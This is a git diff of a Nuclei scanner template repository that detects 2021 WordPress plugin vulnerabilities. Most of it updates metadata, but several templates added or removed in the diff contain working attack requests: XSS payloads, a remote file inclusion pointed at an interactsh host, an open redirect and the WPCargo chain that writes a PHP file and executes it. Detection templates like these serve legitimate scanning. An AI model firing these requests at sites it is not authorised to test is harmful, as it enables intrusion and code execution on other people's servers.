wpscan,cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated + tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360 http: - raw: @@ -48,4 +50,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and -# digest: 4b0a00483046022100d40243af70c92f6e2b514b9f12d93ca38c96a2db17bc9ce5541ad1beb29c4347022100ada8220e7ea0a925f054e794c54211b1070bdd6753a25c9d75ffdff7f19911f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24979.yaml b/nuclei-templates/CVE-2021/CVE-2021-24979.yaml index aa2d14bc69..7ec3b86095 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24979.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24979 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41034 + epss-percentile: 0.40832 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: paid_memberships_pro framework: wordpress publicwww-query: /wp-content/plugins/paid-memberships-pro/ - tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated + tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios http: - raw: @@ -48,4 +48,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4b0a00483046022100be8762aab0014aae59ad8f82ea971a76605765da846117899be68986fb134022022100b1fab4254f11e5938733cb6efa162fd5e317908df93a790bdb1a039b32ef0a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml deleted file mode 100644 index 8be68cf940..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-24991 - -info: - name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS - author: cckuailong - severity: medium - description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard. - reference: - - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2021-24991 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" - - "WooCommerce PDF Invoices" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25003.yaml b/nuclei-templates/CVE-2021/CVE-2021-25003.yaml index 05739f4468..991a425d77 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25003.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25003.yaml @@ -1,37 +1,47 @@ id: CVE-2021-25003 info: - name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution + name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution author: theamanrawat severity: critical description: | - The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE. + WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. + remediation: | + Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a - https://wordpress.org/plugins/wpcargo/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25003 - cwe-id: CWE-434 + cwe-id: CWE-434,CWE-94 + epss-score: 0.61252 + epss-percentile: 0.97725 + cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan - + verified: true + max-request: 3 + vendor: wptaskforce + product: wpcargo_track_\&_trace + framework: wordpress + tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce variables: num: "999999999" -requests: +http: - raw: - | GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1 Host: {{Hostname}} @@ -39,13 +49,13 @@ requests: 2={{md5(num)}} - req-condition: true matchers: - type: dsl dsl: - - "status_code_1 != 200" - - "status_code_2 == 200" - - "status_code_3 == 200" - - "contains(body_3, md5(num))" - - "contains(body_3, 'PNG')" + - status_code_1 != 200 + - status_code_2 == 200 + - status_code_3 == 200 + - contains(body_3, md5(num)) + - contains(body_3, 'PNG') condition: and +# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25016.yaml b/nuclei-templates/CVE-2021/CVE-2021-25016.yaml index b24d2855db..5495d8a66f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25016.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.4302 + epss-percentile: 0.42122 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: - raw: @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a1220adb770bcc72f08fc88649fdc78d03db3b76745ad89dcb404480584b8d0a022100e219deafb651445b5d88bc4b21f50a30aa96fc9f65eddbc48d14de2ad2a2fdd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25052.yaml b/nuclei-templates/CVE-2021/CVE-2021-25052.yaml deleted file mode 100644 index f83fa69d8f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25052.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-25052 - -info: - name: The Button Generator WordPress plugin < 2.3.3 - RFI - author: cckuailong - severity: high - description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE. - reference: - - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-25052 - cwe-id: CWE-352 - tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: interactsh_protocol - name: http - words: - - "http" diff --git a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml b/nuclei-templates/CVE-2021/CVE-2021-25055.yaml deleted file mode 100644 index 62b2146692..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2021-25055 - -info: - name: WordPress FeedWordPress < 2022.0123 - Authenticated Reflected Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. - reference: - - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-25055 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - - -# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25063.yaml b/nuclei-templates/CVE-2021/CVE-2021-25063.yaml index e6e9a265ec..0a98c205c0 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25063.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25063.yaml @@ -1,19 +1,33 @@ id: CVE-2021-25063 info: - name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS) + name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting author: dhiyaneshDk severity: medium - description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting - reference: https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb + description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. + remediation: | + Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch. + reference: + - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb + - https://nvd.nist.gov/vuln/detail/CVE-2021-25063 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 - tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated + epss-score: 0.00106 + epss-percentile: 0.42838 + cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: cf7skins + product: contact_form_7_skins + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,7 +41,6 @@ requests: GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -43,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25065.yaml b/nuclei-templates/CVE-2021/CVE-2021-25065.yaml index b106b1bfdc..b93d7867d1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25065.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25065.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc @@ -16,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28841 + epss-percentile: 0.2831 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: smash_balloon_social_post_feed framework: wordpress publicwww-query: "/wp-content/plugins/custom-facebook-feed/" - tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 490a00463044022071f353d5c50069d334a4af786875823497d09d6a8d73314e9453953cb45ff681022032d065881fecb0efbd1776be4d1f4531c4389997ddc4aa4454ace3d6ee726e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25067.yaml b/nuclei-templates/CVE-2021/CVE-2021-25067.yaml index 20a9fb5081..2e52fe0e79 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25067.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25067.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.9.6. reference: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc @@ -17,7 +19,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28841 + epss-percentile: 0.285 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: pluginops product: landing_page framework: wordpress - tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add + tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and -# digest: 4b0a004830460221008ed583a9117951a7d4d178c589eb17b49fb14ee4b30fb080b4106e8502c8855c022100fbcd03b2116f5908afa815ea3261adb9a85fa62f8a34886e87d4d70c8a482a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25074.yaml b/nuclei-templates/CVE-2021/CVE-2021-25074.yaml new file mode 100644 index 0000000000..726e7dd13e --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25074.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-25074 + +info: + name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect + author: dhiyaneshDk + severity: medium + description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. + remediation: | + Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. + reference: + - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25074 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25074 + cwe-id: CWE-601 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: webp_converter_for_media_project + product: webp_converter_for_media + framework: wordpress + tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25075.yaml b/nuclei-templates/CVE-2021/CVE-2021-25075.yaml new file mode 100644 index 0000000000..c3af39b163 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25075.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-25075 +info: + name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS + author: DhiyaneshDK + severity: low + description: | + The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. + remediation: Fixed in version 1.5.1. + reference: + - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N + cvss-score: 3.50 + cve-id: CVE-2021-25075 + cwe-id: CWE-862 + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p + - | + GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" + - "toplevel_page_wpda_duplicate_post_menu" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25078.yaml b/nuclei-templates/CVE-2021/CVE-2021-25078.yaml index 8bde118a09..40a84382ea 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25078.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25078.yaml @@ -6,18 +6,21 @@ info: severity: medium description: | The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.9.0 reference: - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e - https://nvd.nist.gov/vuln/detail/CVE-2021-25078 - https://plugins.trac.wordpress.org/changeset/2648196 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.70049 + epss-percentile: 0.72505 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: wpaffiliatemanager product: affiliates_manager framework: wordpress - tags: cve,wp,wordpress,authenticated,cve2021,affiliates-manager,wp-plugin,xss,wpscan + tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager http: - raw: @@ -51,4 +54,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and -# digest: 4a0a00473045022100ece5db96fd2febfa8b8fba4c5f665d554470ed3a478f1ce4cd9b032401eea3c9022005ebb652d9f7512cc7b5fb6590429fc8176f9693d50def2612082e18bbadd963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25079.yaml b/nuclei-templates/CVE-2021/CVE-2021-25079.yaml index 12e7630d15..8966b0c494 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25079.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41034 + epss-percentile: 0.40882 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: contact_form_entries framework: wordpress google-query: inurl:"/wp-content/plugins/contact-form-entries/" - tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss + tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks http: - raw: @@ -48,4 +48,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and -# digest: 4b0a00483046022100df0e4967278ed82a569099007fe558e794f5c0f98dd778060b8aa6c535952d6a022100bca9f83d5233990ac20c32f5d853a6647ee380b4b7b8222bf07ab6d51817b486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml deleted file mode 100644 index 250ce81d36..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-25085 - -info: - name: WOOF WordPress plugin - Cross-Site Scripting - author: Maximus Decimus - severity: medium - description: | - The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 - - https://plugins.trac.wordpress.org/changeset/2648751 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25085 - metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"additional_fields":[""]}' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25099.yaml b/nuclei-templates/CVE-2021/CVE-2021-25099.yaml index 2dad95879c..9ad8526fe2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25099.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25099.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 + - https://plugins.trac.wordpress.org/changeset/2659032 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25099 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve + verified: true + max-request: 1 + vendor: givewp + product: givewp + framework: wordpress + tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp -requests: +http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 @@ -36,5 +49,4 @@ requests: - 'contains(body, "")' - 